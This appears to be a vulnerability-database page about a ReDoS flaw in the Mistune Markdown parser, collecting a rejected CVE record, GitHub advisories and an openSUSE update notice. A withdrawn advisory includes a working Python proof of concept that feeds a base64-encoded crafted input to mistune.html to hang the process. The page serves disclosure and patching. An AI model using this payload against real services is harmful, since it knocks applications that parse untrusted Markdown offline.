Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2026-33441 (GCVE-0-2026-33441)
Vulnerability from cvelistv5 – Published: – Updated: 2026-05-06 19:28This CVE is a duplicate of another CVE: CVE-2026-33079.
Replaced by CVE-2026-33079
Show details on NVD website{
"containers": {
"cna": {
"providerMetadata": {
"dateUpdated": "2026-05-06T19:28:19.227Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"rejectedReasons": [
{
"lang": "en",
"value": "This CVE is a duplicate of another CVE: CVE-2026-33079."
}
],
"replacedBy": [
"CVE-2026-33079"
]
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-33441",
"dateRejected": "2026-05-06T19:28:19.227Z",
"dateReserved": "2026-03-19T18:45:22.438Z",
"dateUpdated": "2026-05-06T19:28:19.227Z",
"state": "REJECTED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2026-33441\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-05-06T20:16:31.473\",\"lastModified\":\"2026-05-06T20:16:31.473\",\"vulnStatus\":\"Rejected\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Rejected reason: This CVE is a duplicate of another CVE: CVE-2026-33079.\"}],\"metrics\":{},\"references\":[]}}"
}
}
GHSA-95RC-Q2RV-9F92
Vulnerability from github – Published: 2026-05-06 21:31 – Updated: 2026-05-06 21:31Rejected reason: This CVE is a duplicate of another CVE: CVE-2026-33079.
{
"affected": [],
"aliases": [
"CVE-2026-33441"
],
"database_specific": {
"cwe_ids": [],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-05-06T20:16:31Z",
"severity": null
},
"details": "Rejected reason: This CVE is a duplicate of another CVE: CVE-2026-33079.",
"id": "GHSA-95rc-q2rv-9f92",
"modified": "2026-05-06T21:31:42Z",
"published": "2026-05-06T21:31:41Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33441"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-HJPH-F4MC-WX4C
Vulnerability from github – Published: 2026-05-06 16:56 – Updated: 2026-05-06 19:41Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-8mp2-v27r-99xp. This link is maintained to preserve external references.
Original Description
Summary
Denial-of-Service (DoS) vulnerability in the Mistune Markdown parser. The issue occurs when processing specially crafted reference links, which can cause excessive parsing and CPU consumption, leading to application hangs.
Function affected: parse_link_title() in helpers.py Issue: Malformed reference links cause excessive backtracking and parsing loops. Impact: Remote attackers can submit malicious Markdown to hang processes, causing service unavailability.
Details
Name: mistune
Version: 3.2.0
Python version: Python 3.13.9
PIP version: pip 25.2
OS: Kali-linux-VERSION="2025.4"
PoC
import mistune
import base64
print("Exploit started....!")
data = base64.b64decode(
"WX5Efn5+RH5+fkRbIVt6XQoKW3q7XTpdOgoifn5+RFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcflt+RFshW3pdCgpbeg=="
)
mistune.html(data.decode("utf-8", errors="ignore"))
Reproduce steps:
Simply execute above python script it will hang & increase cpu utilization to 100%
Fuzzer Output (libFuzzer):
ERROR: libFuzzer: timeout after 3 seconds
SUMMARY: libFuzzer: timeout
Stack Trace (Excerpt):
mistune/helpers.py:170 in parse_link_title
mistune/block_parser.py:259 in parse_ref_link
mistune/core.py:216 in parse_method
mistune/block_parser.py:458 in parse
mistune/markdown.py:93 in parse
mistune/markdown.py:120 in __call__
IMAGE POC:
Impact:
Denial-of-Service (DoS) High CPU usage and application hang Potential for service unavailability in web apps or APIs processing untrusted Markdown
Suggested Mitigations:
Implement parsing depth and iteration limits. Limit reference-link title length. Detects excessive escape character sequences. Add defensive checks in parse_link_title. Add fuzz regression tests using the provided PoC.
This vulnerability was discovered using coverage-guided fuzzing and is reproducible consistently.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.2.0"
},
"package": {
"ecosystem": "PyPI",
"name": "mistune"
},
"ranges": [
{
"events": [
{
"introduced": "3.0.0a1"
},
{
"fixed": "3.2.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-400"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-06T16:56:26Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-8mp2-v27r-99xp. This link is maintained to preserve external references.\n\n### Original Description\n\n### Summary\n**Denial-of-Service (DoS)** vulnerability in the Mistune Markdown parser. The issue occurs when processing specially crafted reference links, which can cause excessive parsing and CPU consumption, leading to application hangs.\n\n**Function affected:** parse_link_title() in helpers.py\n**Issue:** Malformed reference links cause excessive backtracking and parsing loops.\n**Impact:** Remote attackers can submit malicious Markdown to hang processes, causing service unavailability.\n\n### Details\n```\nName: mistune\nVersion: 3.2.0\nPython version: Python 3.13.9\nPIP version: pip 25.2\nOS: Kali-linux-VERSION=\"2025.4\"\n```\n\n### PoC\n```\nimport mistune\nimport base64\n\nprint(\"Exploit started....!\")\ndata = base64.b64decode(\n \"WX5Efn5+RH5+fkRbIVt6XQoKW3q7XTpdOgoifn5+RFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcflt+RFshW3pdCgpbeg==\"\n)\nmistune.html(data.decode(\"utf-8\", errors=\"ignore\"))\n```\n\n### Reproduce steps:\nSimply execute above python script it will hang \u0026 increase cpu utilization to 100%\n\n**Fuzzer Output (libFuzzer):**\n```\nERROR: libFuzzer: timeout after 3 seconds\nSUMMARY: libFuzzer: timeout\n```\n\n**Stack Trace (Excerpt):**\n```\nmistune/helpers.py:170 in parse_link_title\nmistune/block_parser.py:259 in parse_ref_link\nmistune/core.py:216 in parse_method\nmistune/block_parser.py:458 in parse\nmistune/markdown.py:93 in parse\nmistune/markdown.py:120 in __call__\n```\n### IMAGE POC:\n\u003cimg width=\"1194\" height=\"728\" alt=\"POC\" src=\"https://github.com/user-attachments/assets/009e836f-fff7-439e-b0be-6e889bed0077\" /\u003e\n\n\n### Impact:\nDenial-of-Service (DoS)\nHigh CPU usage and application hang\nPotential for service unavailability in web apps or APIs processing untrusted Markdown\n\n### Suggested Mitigations:\nImplement parsing depth and iteration limits.\nLimit reference-link title length.\nDetects excessive escape character sequences.\nAdd defensive checks in parse_link_title.\nAdd fuzz regression tests using the provided PoC.\n\nThis vulnerability was discovered using coverage-guided fuzzing and is reproducible consistently.",
"id": "GHSA-hjph-f4mc-wx4c",
"modified": "2026-05-06T19:41:14Z",
"published": "2026-05-06T16:56:26Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/lepture/mistune/security/advisories/GHSA-hjph-f4mc-wx4c"
},
{
"type": "PACKAGE",
"url": "https://github.com/lepture/mistune"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P",
"type": "CVSS_V4"
}
],
"summary": "Duplicate Advisory: Mistune has a ReDoS in LINK_TITLE_RE that allows denial of service via crafted Markdown input",
"withdrawn": "2026-05-06T19:41:14Z"
}
OPENSUSE-SU-2026:10761-1
Vulnerability from csaf_opensuse - Published: 2026-05-12 00:00 - Updated: 2026-05-12 00:00| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.x86_64 | — |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.x86_64 | — |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.x86_64 | — |
Vendor Fix
|
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "python311-mistune-3.2.1-1.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the python311-mistune-3.2.1-1.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2026-10761",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2026_10761-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-33079 page",
"url": "https://www.suse.com/security/cve/CVE-2026-33079/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-33441 page",
"url": "https://www.suse.com/security/cve/CVE-2026-33441/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-44897 page",
"url": "https://www.suse.com/security/cve/CVE-2026-44897/"
}
],
"title": "python311-mistune-3.2.1-1.1 on GA media",
"tracking": {
"current_release_date": "2026-05-12T00:00:00Z",
"generator": {
"date": "2026-05-12T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2026:10761-1",
"initial_release_date": "2026-05-12T00:00:00Z",
"revision_history": [
{
"date": "2026-05-12T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "python311-mistune-3.2.1-1.1.aarch64",
"product": {
"name": "python311-mistune-3.2.1-1.1.aarch64",
"product_id": "python311-mistune-3.2.1-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "python313-mistune-3.2.1-1.1.aarch64",
"product": {
"name": "python313-mistune-3.2.1-1.1.aarch64",
"product_id": "python313-mistune-3.2.1-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "python314-mistune-3.2.1-1.1.aarch64",
"product": {
"name": "python314-mistune-3.2.1-1.1.aarch64",
"product_id": "python314-mistune-3.2.1-1.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "python311-mistune-3.2.1-1.1.ppc64le",
"product": {
"name": "python311-mistune-3.2.1-1.1.ppc64le",
"product_id": "python311-mistune-3.2.1-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python313-mistune-3.2.1-1.1.ppc64le",
"product": {
"name": "python313-mistune-3.2.1-1.1.ppc64le",
"product_id": "python313-mistune-3.2.1-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python314-mistune-3.2.1-1.1.ppc64le",
"product": {
"name": "python314-mistune-3.2.1-1.1.ppc64le",
"product_id": "python314-mistune-3.2.1-1.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "python311-mistune-3.2.1-1.1.s390x",
"product": {
"name": "python311-mistune-3.2.1-1.1.s390x",
"product_id": "python311-mistune-3.2.1-1.1.s390x"
}
},
{
"category": "product_version",
"name": "python313-mistune-3.2.1-1.1.s390x",
"product": {
"name": "python313-mistune-3.2.1-1.1.s390x",
"product_id": "python313-mistune-3.2.1-1.1.s390x"
}
},
{
"category": "product_version",
"name": "python314-mistune-3.2.1-1.1.s390x",
"product": {
"name": "python314-mistune-3.2.1-1.1.s390x",
"product_id": "python314-mistune-3.2.1-1.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "python311-mistune-3.2.1-1.1.x86_64",
"product": {
"name": "python311-mistune-3.2.1-1.1.x86_64",
"product_id": "python311-mistune-3.2.1-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "python313-mistune-3.2.1-1.1.x86_64",
"product": {
"name": "python313-mistune-3.2.1-1.1.x86_64",
"product_id": "python313-mistune-3.2.1-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "python314-mistune-3.2.1-1.1.x86_64",
"product": {
"name": "python314-mistune-3.2.1-1.1.x86_64",
"product_id": "python314-mistune-3.2.1-1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-mistune-3.2.1-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.aarch64"
},
"product_reference": "python311-mistune-3.2.1-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-mistune-3.2.1-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.ppc64le"
},
"product_reference": "python311-mistune-3.2.1-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-mistune-3.2.1-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.s390x"
},
"product_reference": "python311-mistune-3.2.1-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-mistune-3.2.1-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.x86_64"
},
"product_reference": "python311-mistune-3.2.1-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-mistune-3.2.1-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.aarch64"
},
"product_reference": "python313-mistune-3.2.1-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-mistune-3.2.1-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.ppc64le"
},
"product_reference": "python313-mistune-3.2.1-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-mistune-3.2.1-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.s390x"
},
"product_reference": "python313-mistune-3.2.1-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-mistune-3.2.1-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.x86_64"
},
"product_reference": "python313-mistune-3.2.1-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python314-mistune-3.2.1-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.aarch64"
},
"product_reference": "python314-mistune-3.2.1-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python314-mistune-3.2.1-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.ppc64le"
},
"product_reference": "python314-mistune-3.2.1-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python314-mistune-3.2.1-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.s390x"
},
"product_reference": "python314-mistune-3.2.1-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python314-mistune-3.2.1-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.x86_64"
},
"product_reference": "python314-mistune-3.2.1-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-33079",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-33079"
}
],
"notes": [
{
"category": "general",
"text": "In versions 3.0.0a1 through 3.2.0 of Mistune, there is a ReDoS (Regular Expression Denial of Service) vulnerability in `LINK_TITLE_RE` that allows an attacker who can supply Markdown for parsing to cause denial of service. The regular expression used for parsing link titles contains overlapping alternatives that can trigger catastrophic backtracking. In both the double-quoted and single-quoted branches, a backslash followed by punctuation can be matched either as an escaped punctuation sequence or as two ordinary characters, creating an ambiguous pattern inside a repeated group. If an attacker supplies Markdown containing repeated ! sequences with no closing quote, the regex engine explores an exponential number of backtracking paths. This is reachable through normal Markdown parsing of inline links and block link reference definitions. A small crafted input can therefore cause significant CPU consumption and make applications using Mistune unresponsive.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.aarch64",
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.ppc64le",
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.s390x",
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.x86_64",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.aarch64",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.ppc64le",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.s390x",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.x86_64",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.aarch64",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.ppc64le",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.s390x",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-33079",
"url": "https://www.suse.com/security/cve/CVE-2026-33079"
},
{
"category": "external",
"summary": "SUSE Bug 1264347 for CVE-2026-33079",
"url": "https://bugzilla.suse.com/1264347"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.aarch64",
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.ppc64le",
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.s390x",
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.x86_64",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.aarch64",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.ppc64le",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.s390x",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.x86_64",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.aarch64",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.ppc64le",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.s390x",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.aarch64",
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.ppc64le",
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.s390x",
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.x86_64",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.aarch64",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.ppc64le",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.s390x",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.x86_64",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.aarch64",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.ppc64le",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.s390x",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-12T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-33079"
},
{
"cve": "CVE-2026-33441",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-33441"
}
],
"notes": [
{
"category": "general",
"text": "This CVE is a duplicate of another CVE: CVE-2026-33079.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.aarch64",
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.ppc64le",
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.s390x",
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.x86_64",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.aarch64",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.ppc64le",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.s390x",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.x86_64",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.aarch64",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.ppc64le",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.s390x",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-33441",
"url": "https://www.suse.com/security/cve/CVE-2026-33441"
},
{
"category": "external",
"summary": "SUSE Bug 1264752 for CVE-2026-33441",
"url": "https://bugzilla.suse.com/1264752"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.aarch64",
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.ppc64le",
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.s390x",
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.x86_64",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.aarch64",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.ppc64le",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.s390x",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.x86_64",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.aarch64",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.ppc64le",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.s390x",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.aarch64",
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.ppc64le",
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.s390x",
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.x86_64",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.aarch64",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.ppc64le",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.s390x",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.x86_64",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.aarch64",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.ppc64le",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.s390x",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-12T00:00:00Z",
"details": "important"
}
],
